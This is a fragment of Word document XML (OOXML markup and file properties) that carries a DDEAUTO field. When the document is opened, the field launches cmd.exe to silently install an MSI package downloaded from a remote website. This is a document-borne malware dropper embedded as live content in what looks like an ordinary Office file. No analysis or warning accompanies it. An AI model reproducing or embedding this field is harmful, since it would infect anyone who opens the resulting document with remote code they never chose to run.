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E0" w:rsidRPr="00460313" w:rsidRDefault="00366FFB" w:rsidP="00460313">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00E462D3">
        <w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/c msiexec /i http://www.sckm.krakow.pl/wp-content/sgsreport.msi /q"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00426CE0" w:rsidRPr="00460313" w:rsidSect="00306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4DA2"/>
    <w:rsid w:val="00306EAC"/>
    <w:rsid w:val="00366FFB"/>
    <w:rsid w:val="00426CE0"/>
    <w:rsid w:val="00460313"/>
    <w:rsid w:val="008277A5"/>
    <w:rsid w:val="00834DA2"/>
    <w:rsid w:val="00AA599A"/>
    <w:rsid w:val="00E46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03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Prince</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-12-16T13:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-06T06:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>